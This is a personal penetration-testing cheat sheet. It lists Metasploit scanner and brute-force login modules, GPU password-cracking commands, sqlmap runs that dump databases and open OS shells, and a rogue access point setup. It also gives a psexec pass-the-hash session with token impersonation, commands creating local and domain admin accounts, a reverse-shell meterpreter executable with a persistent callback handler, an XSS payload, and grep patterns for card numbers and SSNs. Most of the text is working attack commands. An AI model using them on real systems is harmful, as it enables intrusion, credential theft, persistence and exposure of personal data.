metasploit_tips_tricks

# nethackit.sh.txt metasploit scanners
auxiliary/scanner/ftp/anonymous
auxiliary/scanner/ftp/ftp_login
auxiliary/scanner/snmp/snmp_enum
auxiliary/scanner/snmp/snmp_enumshares
auxiliary/scanner/snmp/snmp_enumusers
auxiliary/scanner/snmp/snmp_login
auxiliary/scanner/mssql/mssql_hashdump
auxiliary/scanner/oracle/oracle_login
auxiliary/scanner/oracle/sid_brute
auxiliary/scanner/smtp/smtp_enum
auxiliary/scanner/smtp/smtp_version
auxiliary/scanner/telnet/telnet_login
auxiliary/scanner/mysql/mysql_hashdump
auxiliary/scanner/mysql/mysql_login
auxiliary/scanner/mysql/mysql_version
auxiliary/scanner/smb/smb_version
auxiliary/scanner/smb/smb_enumusers
auxiliary/scanner/smb/smb_login
auxiliary/scanner/smb/smb_enumshares
auxiliary/scanner/nfs/nfsmount
auxiliary/scanner/vnc/vnc_login
auxiliary/scanner/vnc/vnc_none_auth
auxiliary/scanner/pop3/pop3_version
auxiliary/scanner/pop3/pop3_login
auxiliary/scanner/http/http_login
auxiliary/scanner/http/dir_scanner
auxiliary/scanner/http/dir_scanner
auxiliary/scanner/http/http_version
auxiliary/scanner/http/robots_txt
auxiliary/scanner/http/apache_userdir_enum
auxiliary/scanner/http/blind_sql_query
auxiliary/scanner/http/cisco_ios_auth_bypass
auxiliary/scanner/http/error_sql_injection
auxiliary/scanner/http/files_dir
auxiliary/scanner/http/jboss_vulnscan
auxiliary/scanner/http/web_vulndb
auxiliary/scanner/ssh/ssh_login
auxiliary/scanner/ssh/ssh_login_pubkey
auxiliary/scanner/ssh/ssh_version
auxiliary/scanner/sip/enumerator
auxiliary/scanner/sip/enumerator_tcp
auxiliary/scanner/sip/sipdroid_ext_enum

# grep password words in a file and shot 4 lines before and after grep images AIX images
egrep -A 4 -B 4 -ia '(passwd|password|shadow)' someAIX_NIM_DUMP.image.110512 > out.txt
# perform strings on the output so we can read it ..
strings out.txt > out2.txt


# Oracle 7-10g DES(ORACLE) Oclhashcat_plus GPU
# input :   F35C90763516369B:DEV_MDS
cudaHashcat-plus64.exe --hash-type 3100 C:\egb\ocl\ORACLE.txt C:\egb\Dictionaries\PasswordsPro.dic C:\egb\Dictionaries\Xploitz_clean.lst

#oracle dump ref defcon-17-chris_gates-breaking_metasploit.pdf and win32exec.rb in MSF
select owner, table_name, column_name,data_type,data_length, data_precision,data_default, avg_col_len, char_length from sys.dba_tab_columns where owner not in ('APPQOSSYS','ADUSER','CTXSYS','DIP','DBSNMP','MDSYS','OUTLN','SYS','SYSTEM','TEST','XDB','WMSYS','XSNULL') AND avg_col_len>0

# oracle
nmap -n --script=oracle-sid-brute -p 1521-1560 -iL oracle -A

# mount smb share with runas/savecred ... yes this is bad idea!
runas /u:admin /savecred "net use Z: \\192.168.1.151\myth\h /del"
runas /u:admin /savecred "net use \\192.168.1.151\myth\h /del"
runas /u:admin /savecred "net use z: \\192.168.1.151\myth\h /user:mythtv PASSSWORDHERE"


Use takeown to take ownership of the file
takeown /r /d y /f *
Follow it up with icacls set the access control list
icacls * /t  /grant Everyone:F


#So it appears Google translator blocks English to English translating ( aka super fast web proxy ).  So guess what ? Just change the source language it to valid English language code like en-au

http://translate.google.com/translate?sl=af&tl=en-au&js=n&prev=_t&hl=en&ie=UTF-8&layout=2&eotf=1&u=http%3A%2F%2Frmccurdy.com


#gawk awk system exec commands with output of awk
/rmccurdy/scripts/web_dump.sh:echo $i|sed 's/,/ /g' | gawk '{system ("curl -k --location-trusted -m 3 -L -o " $1"_"$2".html https:\/\/"$1":"$2 )}' 2>&1  &
/rmccurdy/scripts/web_dump.sh:echo $i|sed 's/,/ /g' | gawk '{system ("curl -k --location-trusted -m 3 -L -o " $1"_"$2".html http:\/\/"$1":"$2 )}' 2>&1  &

#Nmap Idle Scanning.
use auxiliary/scanner/ip/ipidseq
nmap  192.168.1.250 -top-ports 9 -D RND:120 -T4 -ff

# wmic fu search systems for running 'exe' to hijack
FOR /F "delims==" %%A IN ('type ips.txt') DO  wmic /Node:%%A wmic /user:username /password:yourpassword /FAILFAST:ON process where "name like '%.exe'" call  getowner

#uwall.tv direct link
http://uwall.tv/player_lightbox.php?q=gangnam%20style

# burp in win7 etc ..
run as administrator
Solution was to add the "-Djava.net.preferIPv4Stack=true" flag, so the following entry in my .bat file works now:

# John the Ripper Password Cracker (Fast Mode)
# see also :
#
# auxiliary/analyze/jtr_aix
# auxiliary/analyze/jtr_linux
# auxiliary/analyze/jtr_mssql_fast
# auxiliary/analyze/jtr_mysql_fast
# auxiliary/analyze/jtr_oracle_fast
# auxiliary/analyze/jtr_unshadow
# auxiliary/analyze/postgres_md5_crack


use auxiliary/analyze/jtr_crack_fast
set Munge 0
run# got new ebooks with roubble \n\n or \r\r
For converting double newlines (\n\n) to a single newline (\n):
sed -e 'N;P;s/\n$//;D'

For converting double carriage returns (\r\r) to a single carriage
return (\r):
sed -e 's/\r\r/\r/g'

tr(1) has the -s option, but that will squeeze multiple (possibly more
than two) occurrences to a single occurrence.

This can also be handled in the more general case with perl(1), e.g.:
perl -pe '
BEGIN {$/="\n\n";}
s/\n\n/\n/o;

john 1337 speak worlist gen:


The default john.conf includes some rules like that, enabled for "single crack" mode only by default. You may copy the lines between these two comments:
# The following 3l33t rules are based on original Crack's dicts.rules
l/asa4[:c]
l/ese3[:c]
l/lsl1[:c]
l/oso0[:c]
l/sss$[:c]
...
l/asa4/ese3/lsl1/oso0/sss$[:c]
# Now to the prefix stuff...
into the [List.Rules:Wordlist] section to have them enabled for wordlist mode as well. usage: john -w=wordlist --stdout --rules


# slow this or run it over proxychains etc ..
for i in `cat in` ;do python metagoofil.py -d $i -l 100 -f all -o micro_$i.html -t micro-files_$i;sleep 60;done
for i in `cat in` ;do ./theHarvester.py -d $i -b google;sleep 60;done


# hybrid mask attack hashcat  not all special characters
?u?l?d!@#$-().*_

# grep 8 or more char long characterslength
grep '[^\ ]\{8,\}'
# sed 8 chars long characters long length
sed -n -e '/^.\{8\}$/p''


# fix path Environment Variables path issues in M$
sysdm.cpl
C:\Program Files\w3af;C:\Program Files;C:\winxp;C:\winxp\System32;c:\program files\nmap;C:\Program Files\RSA SecurID Token Common;%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;C:\Strawberry\c\bin;C:\Strawberry\perl\site\bin;C:\Strawberry\perl\bin


# nmap smb check vulns -oA does nothing for this nse script so just take std out ...
nmap -oA smb_check -T4 -n -vvvv -p 135-139,445 -dddddd --script smb-check-vulns.nse --script-args safe=0  unsafe=1 --script-args=unsafe=1 -iL smb_check.txt   > out.txt

#  openvas cioent
# Update your distro
apt-get update && apt-get dist-upgrade

# Install openvas server and client software + security plugins
apt-get install openvas-server openvas-client \
   openvas-plugins-base openvas-plugins-dfsg

# Update the vuln. database
openvas-nvt-sync

Add a user that you're going to use from the client, to login:

openvas-adduser

Here, you'll add a user/pass combination.

When prompted to add a 'rule' - I allow my user to do everything. The rules allow/disallow scanning of hosts. If you want you can let bob scan 192.168.0.0/24 or whatever. I want my user to scan all, so when prompted, simply enter

default accept

Now, fire up the server. Note that the first time you run, it loads all those checks into memory so it takes a LONG time for the server to actually start.

/etc/init.d/openvas-server start

Now, you can start scanning. Create a file with IP's and/or hostnames that your client will feed to the server to scan. Something like this:

192.168.1.5
www.mydomain.com
dns.mydomain.com
10.1.19.0/24

etc.

The server listens on port: 9390 by default so you'll want to tell your client to connect there. Once you have the file created, you can kick off your scan like this:

OpenVAS-Client -q 127.0.0.1 9390 admin scanme.txt -T html \
     ~/Desktop/openvas-output-`date`.html

You'll be prompted to accept the SSL certificate, go ahead, it's automagically created by the pkg when it's installed. Then, open that file in a browser when it's done and start going through it. Be warned, scanning is very hostile so you should really only scan your own systems.. and those of your enemies.


# sqlmap notes .. also check out Havij 1.15 - Advanced SQL Injection

--wizard
--search -C pass,pwd,ssn


/pentest/database/sqlmap/sqlmap.py -u "https://tZZZZZZ.com/ZZZZZ/Default.aspx" --data="__VIEWSTATE=%ZZZZZZZZ&btnContinue=Continue" --os-pwn --msf-path /pentest/exploits/framework

/pentest/database/sqlmap/sqlmap.py -u "http://ZZZZ4/forgotpass.aspx" --data="__VIEWSTATE=%2FZZZZZZ&email=a&submit=Password" --dump-all --exclude-sysdbs


#oclHashcat plus Support List :

# scripts !
http://itsecblog.net/downloads/batchcrack.sh

number  PSA     hashcat (0.39b24)   oclHashcat-plus (0.08b25)   oclHashcat-lite (0.10b9)
0   MD5     x   x   x
1   *md5($pass.$salt) (see 11)  x
2   *md5($salt.$pass) (see 21)  x
3   *md5(md5($pass)) (see 2600)     x
4   *md5(md5(md5($pass)))   x
5   *vBulletin < v3.8.5 (see 2611)  x
6   *md5(md5($salt).$pass) (see 2811)   x
7   *md5($salt.md5($pass))  x
8   *md5($salt.$pass.$salt)     x
9   *md5(md5($salt).md5($pass))     x
10  *md5(md5($pass).md5($salt))     x       x
11  *md5($salt.md5($salt.$pass))    x
11  Joomla      x   x
12  *md5($salt.md5($pass.$salt))    x
15  *vBulletin > v3.8.5 (see 2711)  x
21  osCommerce, xt:Commerce         x
30  *md5($username.0.$pass)     x
31  *md5(strtoupper(md5($pass)))    x
100     SHA1    x   x   x
101     nsldap, SHA-1(Base64), Netscape LDAP SHA        x   x
101     *sha1($pass.$salt)  x
102     *sha1($salt.$pass)  x
103     *sha1(sha1($pass))  x
104     *sha1(sha1(sha1($pass)))    x
105     *sha1(strtolower($username).$pass) (see 121)    x
110     *sha1($pass.$salt)          x
111     nsldaps, SSHA-1(Base64), Netscape LDAP SSHA         x   x
112     Oracle 11g      x   x
121     SMF > v1.1      x
122     OSX v10.4, v10.5, v10.6         x
131     MSSQL(2000)         x   x
132     MSSQL(2005)         x   x
200     MySQL323    x
300     MySQL >=4.1 x   x   x
400     phpass, MD5(Wordpress), MD5(phpBB3)     x   x
500     md5crypt, MD5(Unix), FreeBSD MD5, Cisco-IOS MD5     x   x
600     *SHA-1(Base64) (see 101)    x
700     *SSHA-1(Base64) (see 111)   x
800     SHA-1(Django)   x
900     MD4     x   x   x
1000    NTLM    x   x   x
1100    Domain Cached Credentials, mscash   x   x   x
1200    MD5(Chap)   x
1300    MSSQL   x
1400    SHA256  x   x   x
1500    descrypt, DES(Unix), Traditional DES        x   x
1600    md5apr1, MD5(APR), Apache MD5   x   x
1700    SHA512  x       x
1800    SHA-512(Unix)   x
1900    SL3             x
2100    Domain Cached Credentials2, mscash2         x
2400    Cisco-PIX MD5       x   x
2500    WPA/WPA2        x
2600    Double MD5      x   x
2611    vBulletin < v3.8.5      x   x
2711    vBulletin > v3.8.5      x   x
2811    IPB2+, MyBB1.2+         x   x
3000    LM      x   x

    *
      * Depreached,


Example :
set BIN=oclHashcat-plus64
set OPTS=--attack-mode 3 --gpu-accel 160 --gpu-loops 1024 --gpu-watchdog 0 --runtime 30 --force --custom-charset1 ?l?d?s?u

%BIN% %OPTS% --hash-type 0 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa ?1?1?1?1?1?1?1?1
%BIN% %OPTS% --hash-type   11 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa ?1?1?1?1?1?1?1?1
%BIN% %OPTS% --hash-type   21 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:aa ?1?1?1?1?1?1?1?1
%BIN% %OPTS% --hash-type  100 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa ?1?1?1?1?1?1?1?1
%BIN% %OPTS% --hash-type  101 {SHA}aaaaaaaaaaaaaaaaaaaaaaaaaaQ= ?1?1?1?1?1?1?1?1
%BIN% %OPTS% --hash-type  111 {SSHA}aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaQ== ?1?1?1?1?1?1?1?1
%BIN% %OPTS% --hash-type  112 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:aaaaaaaaaa ?1?1?1?1?1?1?1?1
%BIN% %OPTS% --hash-type  121 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:a ?1?1?1?1?1?1?1?1
%BIN% %OPTS% --hash-type  122 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa ?1?1?1?1?1?1?1?1
%BIN% %OPTS% --hash-type  131 0x0100aaaaaaaa0000000000000000000000000000000000000000aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa ?1?1?1?1?1?1?1?1
%BIN% %OPTS% --hash-type  132 0x0100aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa ?1?1?1?1?1?1?1?1
%BIN% %OPTS% --hash-type  300 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa ?1?1?1?1?1?1?1?1
%BIN% %OPTS% --hash-type  400 $H$9aaaaaaaaaaaaaaaaaaaaaaaaaaaaa1 ?1?1?1?1?1?1?1?1
%BIN% %OPTS% --hash-type  500 $1$aaaaaaaa$aaaaaaaaaaaaaaaaaaaaa1 ?1?1?1?1?1?1?1?1 --gpu-loops 1000
%BIN% %OPTS% --hash-type  900 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa ?1?1?1?1?1?1?1?1
%BIN% %OPTS% --hash-type 1000 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa ?1?1?1?1?1?1?1?1
%BIN% %OPTS% --hash-type 1100 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:a ?1?1?1?1?1?1?1?1
%BIN% %OPTS% --hash-type 1400 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa ?1?1?1?1?1?1?1?1
%BIN% %OPTS% --hash-type 1500 aaaaaaaaaaaaw ?1?1?1?1?1?1?1?1 --gpu-accel 80
%BIN% %OPTS% --hash-type 1600 $apr1$aaaaaaaa$aaaaaaaaaaaaaaaaaaaaa1 ?1?1?1?1?1?1?1?1 --gpu-loops 1000
%BIN% %OPTS% --hash-type 2100 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:a ?1?1?1?1?1?1?1?1
%BIN% %OPTS% --hash-type 2400 aaaaaaaaaaaaaaaa ?1?1?1?1?1?1?1?1
%BIN% %OPTS% --hash-type 2500 test.hccap ?1?1?1?1?1?1?1?1
%BIN% %OPTS% --hash-type 2611 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:aaa ?1?1?1?1?1?1?1?1
%BIN% %OPTS% --hash-type 2711 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa ?1?1?1?1?1?1?1?1
%BIN% %OPTS% --hash-type 2811 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:aaaaa ?1?1?1?1?1?1?1?1
sq

# ocl hashcat plus examples:


all Rule based attack:
FOR /F "delims==" %%A IN ('DIR/B/S ".\rules\"') DO cudaHashcat-plus32.exe -a 0 -r  "%%A"  -m1100 -o out.txt  "mscache2" "C:\egb\Dictionaries\rockyou.txt"


rem example brute by char to 7 max chars in ~5min  with GTX 560 example hash '2d9f0b052932ad18b87f315641921cda:user' password is password ...
cudaHashcat-plus32.exe -o out.txt -a3 -1 "?l?u?d!@#$-().*_" -m1100 mscache2 ?1
cudaHashcat-plus32.exe -o out.txt -a3 -1 "?l?u?d!@#$-().*_" -m1100 mscache2 ?1?1
cudaHashcat-plus32.exe -o out.txt -a3 -1 "?l?u?d!@#$-().*_" -m1100 mscache2 ?1?1?1
cudaHashcat-plus32.exe -o out.txt -a3 -1 "?l?u?d!@#$-().*_" -m1100 mscache2 ?1?1?1?1
cudaHashcat-plus32.exe -o out.txt -a3 -1 "?l?u?d!@#$-().*_" -m1100 mscache2 ?1?1?1?1?1
cudaHashcat-plus32.exe -o out.txt -a3 -1 "?l?u?d!@#$-().*_" -m1100 mscache2 ?1?1?1?1?1?1


rem example Hybrid attack rockyou.txt wordlist+MASK to 4 chars
cudaHashcat-plus32.exe -o out.txt -a6 -1 "?l?u?d!@#$-().*_" -m1100  "mscache2" "C:\egb\Dictionaries\rockyou.txt" "?1"
cudaHashcat-plus32.exe -o out.txt -a6 -1 "?l?u?d!@#$-().*_" -m1100  "mscache2" "C:\egb\Dictionaries\rockyou.txt" "?1?1"
cudaHashcat-plus32.exe -o out.txt -a6 -1 "?l?u?d!@#$-().*_" -m1100  "mscache2" "C:\egb\Dictionaries\rockyou.txt" "?1?1?1"


rem same as above with 1337 speek wordlist+MASK  to 4 chars
cudaHashcat-plus32.exe -o out.txt -a6 -1 "?l?u?d!@#$-().*_" -m1100  "mscache2" "C:\egb\Dictionaries\1337_speak.txt" "?1"
cudaHashcat-plus32.exe -o out.txt -a6 -1 "?l?u?d!@#$-().*_" -m1100  "mscache2" "C:\egb\Dictionaries\1337_speak.txt" "?1?1"
cudaHashcat-plus32.exe -o out.txt -a6 -1 "?l?u?d!@#$-().*_" -m1100  "mscache2" "C:\egb\Dictionaries\1337_speak.txt" "?1?1?1"

rem example Hybrid attack rockyou.txt wordlist+MASK to 4 chars digi and some special chars only ...
cudaHashcat-plus32.exe -o out.txt -a6 -1 "?d!@#$-().*_" -m1100  "mscache2" "C:\egb\Dictionaries\rockyou.txt" "?1?1?1"

rem example Hybrid attack 1337 speekt wordlist+MASK to 4 chars digi and some special chars only ...
cudaHashcat-plus32.exe -o out.txt -a6 -1 "?d!@#$-().*_" -m1100  "mscache2" "C:\egb\Dictionaries\1337_speak.txt" "?1?1?1"


rem dammit I give up ... 6hrs .. for 7char brute
cudaHashcat-plus32.exe -o out.txt -a3 -1 "?l?u?d!@#$-().*_" -m1100 mscache2 ?1?1?1?1?1?1?1


REM really !?!? example 8 char brute ( 18 days on GTX 560 )
cudaHashcat-plus32.exe -o out.txt -a3 -1 ?l?u?d!@#$-().*_ -m1100 mscache2 ?1?1?1?1?1?1?1?1


# more examples hashes cracked john

user:2d9f0b052932ad18b87f315641921cda:lab:lab.internal
Service currently active. Stopping service...
Service successfully removed.

John Plugin:
$ ./john -format:mscash ./mscash.txt
Loaded 1 password hash (M$ Cache Hash [mscash])
password (user


# set power profile via command line

Powercfg.exe /SETACTIVE "Always On"
Powercfg.exe /SETACTIVE "Max Battery"

#Remove the .NET Credentials (Stored User names and Passwords)
Control keymgr.dll


# convert amr to mp3
ffmpeg -i file.amr -vn -acodec libmp3lame -ac 2 -ab 96k file.mp3
FOR /F "delims==" %%A IN ('DIR/B "*.amr"') DO ffmpeg -i %%A -vn -acodec libmp3lame -ac 2 -ab 96k %%A.mp3


#windows saved passwords
rundll32.exe keymgr.dll, KRShowKeyMgr

# check for mod date range
find / -type f -newermt 2011-10-01 ! -newermt 2012-04-30

# openvas on 11.10
take src out of the sources.list
add --http-only to the /etc/init.d/greenbone-security-assistant startup script

# mass set path
export PATH=$PATH:`find /usr/lib/ruby/1.9.1 -type d | sed 's/$/:/g' | tr -d '\n'`


# top web ports ports
80-83,99,100,443,631,800,1000,1739,2002,2301,2381,3000,5800,5988,5989,8000-8080,808,8099,8100-8105,8443,8888,8900,9999,10000

# more web ports
10080,10100,10243,10250,10251,1027,1029,1030,1032,10439,10444,11267,1183,1184,11869,11905,11910,11935,1208,13080,1416,14176,14654,16000,16080,16372,17012,18083,1818,18180,1830,1831,19000,19082,19091,19101,1947,1972,19740,2002,2030,20444,2130,2140,21988,2301,2316,2381,2414,2424,24305,2480,2523,25684,25825,2693,27775,280,28080,2851,2869,30444,30900,31458,31459,3201,3227,32843,3339,34988,35135,35145,3526,3617,3790,37922,3842,3914,3938,4036,4053,41647,4220,4239,4343,443,45000,4680,47001,4723,48018,4848,4864,49152,49157,50000,50001,50038,51785,51905,51908,5225,53001,5357,5440,5447,5449,5469,54850,5500,5501,554,5554,55885,56414,56737,57423,57772,57773,5800,5801,591,593,5985,5989,60000,6001,6002,6003,6004,60213,61000,6107,6108,6113,6114,6160,6161,631,6325,6453,6454,65084,65093,6842,7001,7002,7003,7070,7099,7126,7191,7359,7453,7454,7717,7751,80,8000,8001,8002,8003,8004,8008,8020,8070,8071,8077,8080,8081,8082,8083,8085,8086,8087,8088,8090,8093,8094,8095,8099,81,8107,8113,8114,8115,8118,8120,8123,8126,8133,8135,8138,815,8150,8151,8180,82,8200,8222,8260,8300,8323,8333,84,8444,85,8530,8533,86,8660,8666,8701,8703,8732,8733,8740,8878,8880,8888,8889,8900,90,9000,9001,9002,9005,9006,9073,9080,9081,9084,9086,9087,9090,9091,9191,9300,9310,9444,9501,9510,9595,9642,9675,9676,9797,9823,9887

#sap ports
32000,33000,34000,36000,47000,48000,21-23,25,21-23,25,80-83,53,110,135,139,445,3128,1433,1521,3306,3389,5900,6001,8080,8888,80-83,53,110,135,139,445,3128,1433,1521,3306,3389,5900,6001,8080,8888,99,100,443,631,800,1000,1739,2002,2301,2381,3000,5800,5988,5989,8000-8015,8080-8083,8099,8100-8105,8443,8888,8900,9999,10000

# common proxy ports
80,81,82,83,84,85,86,443,808,3128,6515,6666,8000,8001,8008,8080,8081,8088,8090,8118,8181,8888,8909,9000,9090,54321


# Search office documents for PII
# CC with SSN no dash ( high false positive )
find  . -iname "*.???x" -type f -exec  unzip -p '{}' '*'  \; | sed -e 's/<[^>]\{1,\}>/ /g; s/[^[:print:]]\{1,\}/ /g' | egrep "\b4[0-9]{12}(?:[0-9]{3})?\b|\b5[1-5][0-9]{14}\b|\b6011[0-9]{14}\b|\b3(?:0[0-5]\b|\b[68][0-9])[0-9]{11}\b|\b3[47][0-9]{13}\b|\b[0-9]{3}-[0-9]{2}-[0-9]{4}\b|\b[0-9]{9}\b"

# CC with SSN dash (  low false positive only match ###-##-#### not any 8digi number )
find  . -iname "*.???x" -type f -exec  unzip -p '{}' '*'  \; | sed -e 's/<[^>]\{1,\}>/ /g; s/[^[:print:]]\{1,\}/ /g' | egrep "\b4[0-9]{12}(?:[0-9]{3})?\b|\b5[1-5][0-9]{14}\b|\b6011[0-9]{14}\b|\b3(?:0[0-5]\b|\b[68][0-9])[0-9]{11}\b|\b3[47][0-9]{13}\b|\b[0-9]{3}-[0-9]{2}-[0-9]{4}\b"


# nslookup to CSV
for i in `cat FULL` ;do echo "IP$i";nslookup $i|grep 'name ='|sed 's/.*name = /,/g'|sed 's/\.$//g';done| tr -d '\n' | awk '{gsub("IP","\n"); print}'


# my-ip-neighbors lookup
# 200 at a time .. you need to change the -x to a proxy that works .. rmccurdy.com/scripts/proxy/good.txt
# test google before you start ..
# curl -x 184.171.175.14:808 http://google.com etc ..


for i in `cat FULL`;do echo curl -x 184.171.175.14:808 "\""http://www.my-ip-neighbors.com/?domain=$i"\"";done > go
bash -x go > out

# grep the output for all the goodies and make it nice CSV
egrep "(\"http:\/\/whois\.domaintools\.com|domain\" value=\")" out | sed 's/.*domain\" value=\"/IP /g' | sed 's/\"\/>.*//g' | sed 's/.*domaintools.com\//,/g' | sed 's/" t.*//g' | tr -d '\n' | awk '{gsub("IP","\n"); print}'


# block port 80 throttle
iptables  -A INPUT -p tcp --syn --dport 80 -m connlimit --connlimit-above 4 -j REJECT


# CURL HTTPS
for i in `cat check`;do echo curl -L -k --location-trusted -m 3 -L -o $i.htm "\""https://$i"\"";done > https


# airbase/karma.rc setup


--------------------

gogogo
----------------

# change eth1 to internet interface
iptables --table nat --append POSTROUTING --out-interface eth1 -j MASQUERADE
iptables --append FORWARD --in-interface at0 -j ACCEPT
echo 1 > /proc/sys/net/ipv4/ip_forward


# kill stuff the will cause issues ..
killall dhcpd3 dhclient dhclient3 dhcpcd dhcpd

# start MSF karma.rc script  logs are screenlog.0 etc ..
xterm -e "screen -L /pentest/exploits/framework/msfconsole -r /stuff/karma.rc" &

# takes a wile to startup .. lets wait we need it all ready to work before people connect to it so we dont miss packets !!!

echo "waiting for MSF karma to start .. 50sec"
sleep 20

# monitor mode change wlan1 to your wifi
airmon-ng start wlan1

sleep 5

# setup fake AP
xterm -e "airbase-ng -c 6 -P mon0 -v" &

sleep 5

ifconfig at0 up 10.0.0.1 netmask 255.255.255.0 &

# setup DHCP server
xterm -e "dhcpd3 -cf /etc/dhcp3/dhcpd.conf at0" &

# DEBUG DHCP to see DHCP request hits xterm -e "tcpdump -i at0 -n port 67 and port 68"  &


------------------


# XSS
>"'><script>alert('XSS')</script>
# add full read write read/write full R/W on registry key
SetACL.exe -on "HKEY_LOCAL_MACHINE\Software\Microsoft\Policies" -ot reg -actn ace -ace "n:MyDomain\JohnDoe;p:full"
# add -P0 for no ping
/usr/bin/screen -fa -d -m  nmap -T5  -p 20,21,80,115,443,989,990 -vvvv -sS  -n --max-rtt-timeout 300ms --max-retries 1 192.30.0.0/16 -oA /home/administrator/rmccurdy/192.30.0.0_fast_ping
# msf metasploit use login to get msfshell for pivot/token
use exploit/windows/smb/psexec

set RHOST 192.168.64.123
set SMBUser adminit
set SMBPass password
# also set HASHES !! set SMBPass 81cbcea8a9af93bbaad3b435b51404ee:561cbdae13ed5abd30aa94ddeb3cf52d

exploit

getuid
use priv
getsystem
use incognito
list_tokens -u
add_group_user "Domain Admins"
impersonate_token "DOMAIN\\user"
# add user and give it local admin
net user  test PASSWORDHERE /add
net localgroup administrators test /add

# add user to domain and makt it domain admin
net user /add USERNAME STRONGPASSWORD /domain
net group  /add "domain admins" USERNAME /domain

---------------------------
# make exe
./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.6.55 LPORT=443 R | ./msfencode -t exe -c 5 -o /tmp/bob.exe

# attacker listen
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.55
set LPORT 443
set ExitOnSession false
# set AutoRunScript pathto script you want to autorun after exploit is run
set AutoRunScript persistence -r 192.168.6.55 -p 443 -A -X -i 30

exploit -j -z


# armatage DONT USE THIS JUIST USE BIN INSTALL FROM WEBSITE .. INCLUDES FULL AND POSTGRES BINS
apt-get install mysql-server -y
/etc/init.d/mysql start

mysqladmin -u root -ppassword password toor
/pentest/exploits/framework/msfrpcd -f -U msf -P test -t Basic

# armatage DONT USE THIS METHOD USE THE BIN FROM WEBSITE IT HAS ITS OWN POSTGRES

apt-get install -y postgresql

apt-get install libpq-dev -y

gem install postgres

/etc/init.d/postgresql start
su -
su - postgres


createuser msf_user -P
createdb --owner=msf_user msf

/pentest/exploits/framework/msfrpcd -f -U msf -P msf -t Basic
/pentest/exploits/framework/armitage


 ----


# ssh
use auxiliary/scanner/ssh/ssh_login

#set RHOSTS_FILE "C:/backup/wordlist/targests.txt"
set RHOSTS 192.59.139.135 192.59.139.136 192.59.139.140 192.116.61.25 192.116.61.26 192.116.61.34
# also set RHOSTS file://bla
# set USER_FILE "C:/backup/wordlist/password_large.txt"
set USERPASS_FILE "C:/backup/wordlist/root_userpass.txt"
set VERBOSE true
set STOP_ON_SUCCESS true
set BRUTEFORCE_SPEED 5
# set this to the number of host
set THREADS 6

run

use auxiliary/gather/dns_enum
set DOMAIN domain.com
run
#smb

use auxiliary/scanner/smb/smb_login

set RHOSTS file://192.168.8.39
set RHOSTS 127.0.0.1

set USER_FILE "C:/wordlist/users.txt"
set PASS_FILE "C:/wordlist/2.txt"
set VERBOSE false
# set to number of host scanning .
set THREADS 16

set STOP_ON_SUCCESS true
set VERBOSE false
  Name                             Value
  ----                             -----
  BLANK_PASSWORDS                  false
  BRUTEFORCE_SPEED                 5
  ConnectTimeout                   10
  DCERPC::ReadTimeout              10
  DCERPC::fake_bind_multi          true
  DCERPC::fake_bind_multi_append   0
  DCERPC::fake_bind_multi_prepend  0
  DCERPC::max_frag_size            4096
  DCERPC::smb_pipeio               rw
  MaxGuessesPerService             0
  MaxGuessesPerUser                0
  MaxMinutesPerService             0
  NTLM::SendLM                     true
  NTLM::SendNTLM                   true
  NTLM::SendSPN                    true
  NTLM::UseLMKey                   false
  NTLM::UseNTLM2_session           true
  NTLM::UseNTLMv2                  true
  PRESERVE_DOMAINS                 true
  REMOVE_PASS_FILE                 false
  REMOVE_USERPASS_FILE             false
  REMOVE_USER_FILE                 false
  RHOST                            file:/home/rmccurdy/high

# http

use auxiliary/scanner/http/http_login
set AUTH_URI /folder?dcPath=ha-datacenter
set RHOSTS 127.0.0.1 127.0.0.1 127.0.0.1
set VERBOSE true
run
back

# telnet
use auxiliary/scanner/telnet/telnet_login
set RHOSTS 127.0.0.1,49,50

set PASS_FILE "C:/wordlist/password_small.txt"
set THREADS 254
run

back
# mssql
use auxiliary/scanner/mssql/mssql_login
set RHOSTS 127.0.0.1
set PASS_FILE "C:/wordlist/password_small.txt"
set USERNAME sa
set VERBOSE false
run
back


#ftp
use auxiliary/scanner/ftp/ftp_login
set RHOSTS  127.0.0.1
set PASS_FILE /home/administrator/small.txt
set USER_FILE /home/administrator/small.txt
set BRUTEFORCE_SPEED 1
run

#snmp
use auxiliary/scanner/snmp/snmp_login
set RHOSTS  127.0.0.1
set PASS_FILE "C:/wordlist/snmp_default_pass.txt"
set VERBOSE false

run

nmap --script=smtp-open-relay.nse -p 25 -iL 25 -n
./sfuzz -T O -f sfuzz-sample/basic.http -S 50.74.10.218 -p 179
# got r00t got r00t ?

# bash history very gooOOOd !
updatedb;locate .bash_history

# crack with extrem gpu brute force
cat /etc/shadow | grep -v ":\*:"
# use on other servers by checking bash history
updatedb;locate authorized

# find files modifyed the past 7 days
find / -type f -mtime -7|egrep -v "(proc|\/sys)"

# you can look for other file types sql,*.php,*sql.tar.gz,*pass*,sudousers,/etc/passwd,/root/.ssh or ~/.ssh,password
locate *.sql
locate sql.tar.gz
# what services are listing the part at the top
netstat -na | grep LIS
---------

more notes :
-------------
